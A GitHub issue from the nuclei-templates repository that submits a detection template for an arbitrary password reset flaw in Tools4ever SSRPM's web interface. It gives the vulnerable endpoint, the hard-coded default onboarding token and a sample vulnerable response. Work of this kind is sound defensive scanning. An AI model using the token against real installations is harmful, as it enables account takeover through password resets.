search

projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License
8.99k stars 2.57k forks source link

SSRPM - ARBITRARY PASSWORD RESET ON DEFAULT CLIENT WEB INTERFACE INSTALLATION #10214

Closed vince-isec closed 1 month ago

vince-isec commented 2 months ago

Template Information:

SSRPM (Self-Service Reset Password Manager) is Tools4ever’s premier password self-service solution. It allows organizations of all sizes to unburden their helpdesk and empower their end users regarding forgotten passwords and account management. This solution is usually synchronized with an on-premise Active Directory and its Client Web Interface component is usually exposed to the Internet. The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account.

Issuing a POST request on the endpoint /Onboarding/Import using the default OnboardingToken can determine if the targeted installation is affected by this vulnerability. If it is, it will return an HTTP response with the ErrorCode value -55

Nuclei Template:

generated using ProjectDiscoveryAI Tool


id: tools4ever-ssrpm-arbitrary-password-reset

info:
  name: Tools4Ever SSRPM Arbitrary Password Reset
  author: ProjectDiscoveryAI
  severity: high
  description: |
    Tools4Ever SSRPM is vulnerable to arbitrary password reset due to improper validation of the onboarding token, allowing attackers to take control of certain accounts.
  reference:
    - https://www.synacktiv.com/advisories/ssrpm-arbitrary-password-reset-on-default-client-web-interface-installation

http:
  - raw:
      - |
        POST /Onboarding/Import HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 64
        Content-Type: application/x-www-form-urlencoded

        OnboardingToken=7e30bebc-d17c-4833-98b6-d4c09e076b24&Action=testIntrinsec

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '"ErrorCode":-55'
          - '"Success":false'

Example of response of a vulnerable target:

HTTP/1.1 200 OK Date: Tue, 25 Jun 2024 12:33:52 GMT Server: XXX Set-Cookie: ASP.NET_SessionId=2iaeferfvwc0j3f30bbjvlmt; path=/; HttpOnly; SameSite=Lax Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: application/json; charset=utf-8 Expires: -1 X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self'; Strict-Transport-Security: max-age=31536000 Content-Length: 133 {"Success":false,"ErrorCode":-55,"ErrorMessage":"An error occurred. Please contact your system administrator if the issue persists."}

DhiyaneshGeek commented 1 month ago

Hi @vince-isec

Thanks for sharing this template with the community, i have raised PR for the same #10381

You can grab some cool PD stickers over here http://nux.gg/stickers 😄